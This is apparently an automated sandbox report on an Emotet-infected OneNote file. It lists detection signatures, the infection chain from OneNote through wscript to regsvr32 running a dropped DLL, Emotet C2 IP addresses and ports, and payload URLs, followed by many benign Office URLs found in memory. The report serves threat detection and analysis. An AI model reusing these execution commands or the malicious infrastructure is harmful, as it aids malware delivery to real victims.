Windows Analysis Report
iMedPub_LTD_6.one

Overview

General Information

Sample Name: iMedPub_LTD_6.one
Analysis ID: 828505
MD5: 4f69e6051723ee2f829d1e5f31463768
SHA1: 812424b2c260ed959ee81c5eb8ac160ea61b31ec
SHA256: 085ac1d179a061584f0bee7670d97af843d4a267ca343a884e5a2f462e3da5c8
Tags: one

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 1236 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_6.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 4440 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 3644 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 3092 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • ONENOTEM.EXE (PID: 5908 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cleanup
Name: Emotet
Description: While Emotet was historically a banking malware organized in a botnet, nowadays it is mostly seen as infrastructure as a service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It always steals information from victims, but the criminal gang behind it also opened up another business channel by selling its infrastructure for delivering additional malicious software. Malware analysts have classified it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Attribution:
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
Source: iMedPub_LTD_6.one, Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Author: Joe Security
Source: 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Author: Arnim Rupp
Source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Author: Joe Security
Source: 3.2.regsvr32.exe.1290000.0.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 4.2.regsvr32.exe.c30000.0.raw.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 4.2.regsvr32.exe.c30000.0.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 3.2.regsvr32.exe.1290000.0.raw.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security

Malware Analysis System Evasion

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 4440, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, ProcessId: 3644, ProcessName: regsvr32.exe
Timestamp: 03/17/23-09:24:11.489145, SID: 2404312, Source: 192.168.2.4:49700, Destination: 182.162.143.56:443, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:24:23.731826, SID: 2404308, Source: 192.168.2.4:49702, Destination: 167.172.199.165:8080, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:27:11.247095, SID: 2404324, Source: 192.168.2.4:49735, Destination: 45.235.8.30:8080, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:27:05.747710, SID: 2404320, Source: 192.168.2.4:49731, Destination: 213.239.212.5:443, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:24:37.030137, SID: 2404302, Source: 192.168.2.4:49707, Destination: 104.168.155.143:8080, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:26:11.494660, SID: 2404318, Source: 192.168.2.4:49723, Destination: 206.189.28.199:8080, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:23:59.776237, SID: 2404344, Source: 192.168.2.4:49697, Destination: 91.121.146.47:8080, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/17/23-09:24:06.184104, SID: 2404330, Source: 192.168.2.4:49699, Destination: 66.228.32.31:7080, Protocol: TCP, Classtype: A Network Trojan was detected

AV Detection

Source: iMedPub_LTD_6.one, ReversingLabs: Detection: 30%
Source: iMedPub_LTD_6.one, Virustotal: Detection: 40%
Source: penshorn.org, Virustotal: Detection: 10%
Source: https://91.207.28.33:8080/, Virustotal: Detection: 16%
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/, Virustotal: Detection: 20%
Source: https://penshorn.org/, Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll, ReversingLabs: Detection: 58%
Source: C:\Windows\System32\JURwocL\wAXwf.dll (copy), ReversingLabs: Detection: 58%
Source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Emotet
Source: unknown, HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_0000000180008D28 FindFirstFileExW, 3_2_0000000180008D28

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Process created: C:\Windows\SysWOW64\wscript.exe

Networking

Source: C:\Windows\SysWOW64\wscript.exe, Domain query: penshorn.org
Source: C:\Windows\SysWOW64\wscript.exe, Network Connect: 203.26.41.131 443
Source: Traffic, Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49700 -> 182.162.143.56:443
Source: Traffic, Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49697 -> 91.121.146.47:8080
Source: Traffic, Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49699 -> 66.228.32.31:7080
Source: Traffic, Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49702 -> 167.172.199.165:8080
Source: Traffic, Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49707 -> 104.168.155.143:8080
Source: Traffic, Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.4:49723 -> 206.189.28.199:8080
Source: Traffic, Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.4:49731 -> 213.239.212.5:443
Source: Traffic, Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49735 -> 45.235.8.30:8080
Source: Joe Sandbox View, ASN Name: RACKCORP-APRackCorpAU
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic, HTTP traffic detected: POST /xqnhpb/ HTTP/1.1, Connection: Keep-Alive, Content-Length: 0, Host: 182.162.143.56
Source: Joe Sandbox View, IP Address: 110.232.117.186
Source: global traffic, HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1, Connection: Keep-Alive, Accept: */*, User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5), Host: penshorn.org
Source: unknown, Network traffic detected: IP country count 17
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://config.edge.skype.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cortana.ai
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cortana.ai/api
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cr.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://d.docs.live.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.o365filtering.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dev.cortana.ai
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://devnull.onenote.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://directory.services.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.ppe.windows.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.ppe.windows.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.windows.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://graph.windows.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://invites.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://lifecycle.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.microsoftonline.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows.local
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://make.powerautomate.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://management.azure.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://management.azure.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.action.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.engagement.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://messaging.office.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://microsoftapc-my.sharepoint.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ncus.contentsync.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ncus.pagecontentsync.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officeapps.live.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://onedrive.live.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://onedrive.live.com/embed?
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://otelrules.azureedge.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office365.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pages.store.office.com/review/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                    Source: wscript.exe, 00000001.00000003.387940812.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416607803.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410465872.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416558932.0000000005BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/
                    Source: wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.00000000058E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399047863.0000000005863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410928876.0000000005389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409154486.0000000005B12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394230105.000000000578B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405910637.0000000005967000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400148476.00000000058CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405867233.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394601502.00000000057AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.415892369.0000000005968000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408129613.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393277198.00000000056D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416390329.0000000005B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393894273.0000000005771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393446805.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.406352017.0000000005985000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406133706.0000000005968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
